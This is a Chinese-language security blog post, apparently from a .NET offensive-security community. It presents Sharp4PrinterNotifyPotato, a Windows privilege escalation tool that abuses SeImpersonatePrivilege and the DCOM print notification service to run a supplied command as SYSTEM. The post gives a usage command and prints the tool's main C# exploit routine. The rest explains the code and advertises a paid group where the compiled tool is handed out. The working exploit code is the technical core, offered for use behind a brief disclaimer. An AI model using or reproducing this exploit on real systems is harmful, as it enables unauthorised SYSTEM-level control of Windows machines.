01
阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02
基本介绍
Sharp4PrinterNotifyPotato 利用了 Windows 中的 DCOM 服务对象和打印通知服务中的权限配置漏洞,通过 SeImpersonatePrivilege 权限进行攻击,从而实现本地权限提升。
03
使用方法
首先需要将源码编译成可执行文件Sharp4PrinterNotifyPotato ,运行时传递要执行的命令作为参数,基本用法如下所示。
Sharp4PrinterNotifyPotato.exe "whoami /all"
工具执行后,当前用户会尝试以 SYSTEM 权限运行传入的命令,并输出结果。具体如下图所示。
04
编码实现
以下是 Sharp4PrinterNotifyPotato 的主要功能实现代码,通过初始化COM和模拟登录用户以及创建DCOM对象完成权限提升,具体代码如下所示。
private unsafe static void Main(string[] args)
{
try
{
NativeMethods.CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, 0, 3, IntPtr.Zero, 64, IntPtr.Zero);
LUID_AND_ATTRIBUTES[] array = new LUID_AND_ATTRIBUTES[1];
using (WindowsIdentity current = WindowsIdentity.GetCurrent())
{
Console.WriteLine("[+] Current user: " + current.Name);
NativeMethods.LookupPrivilegeValue(null, "SeImpersonatePrivilege", out array[0].Luid);
TOKEN_PRIVILEGES structure = default(TOKEN_PRIVILEGES);
structure.PrivilegeCount = 1U;
structure.Privileges = array;
array[0].Attributes = 2U;
if (!NativeMethods.AdjustTokenPrivileges(current.Token, false, ref structure, Marshal.SizeOf<TOKEN_PRIVILEGES>(structure), IntPtr.Zero, IntPtr.Zero) || Marshal.GetLastWin32Error() != 0)
{
Console.WriteLine("[x] SeImpersonatePrivilege not held.");
return;
}
}
Guid clsid = new Guid("{854A20FB-2D44-457D-992F-EF13785D2B51}");
IntPtr zero = IntPtr.Zero;
if (!NativeMethods.LogonUser("X", "X", "X", 9, 3, ref zero) || !NativeMethods.ImpersonateLoggedOnUser(zero))
{
Console.WriteLine("[x] logon as interactive error.");
}
else
{
object obj = null;
int num = NativeMethods.CoCreateInstance(clsid, null, 4, new Guid("00000000-0000-0000-C000-000000000046"), out obj);
if (num != 0)
{
Console.WriteLine("[x] CoCreateInstance fail with HRESULT: 0x" + num.ToString("x"));
}
else
{
IConnectionPointContainer connectionPointContainer = obj as IConnectionPointContainer;
IEnumConnectionPoints enumConnectionPoints;
connectionPointContainer.EnumConnectionPoints(out enumConnectionPoints);
int celt = 1;
int num2 = 0;
IConnectionPoint[] array2 = new IConnectionPoint[1];
num = enumConnectionPoints.Next(celt, array2, (IntPtr)((void*)(&num2)));
CustomQIHolder pUnkSink = new CustomQIHolder(args[0]);
while (array2[0] == null)
{
num = enumConnectionPoints.Next(celt, array2, (IntPtr)((void*)(&num2)));
if (num != 0)
{
break;
}
}
try
{
array2[0].Advise(pUnkSink, out num2);
}
catch
{
}
}
}
}
catch (Exception arg)
{
Console.WriteLine("[x] " + arg);
}
}
Sharp4PrinterNotifyPotato 工具通过初始化 COM 安全性设置,确保当前用户拥有 SeImpersonatePrivilege 权限,并通过模拟一个交互式登录用户,创建一个 DCOM 对象实例,获取 IConnectionPointContainer 接口,并枚举 DCOM 对象的连接点。
随后,工具注册一个自定义事件接收器,以触发权限提升操作,最终以 SYSTEM 权限执行传入的命令。此过程通过调用一系列 Windows API 函数实现。工具已经打包在星球,感兴趣的朋友可以加入自取。
05
推荐阅读
从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!
06
欢迎加入.NET安全星球
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。
目前星球门票¥199,后期价格随着内容和质量的不断沉淀会适当提高,星球即将涨价至 ¥239,因此越早加入越好!
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。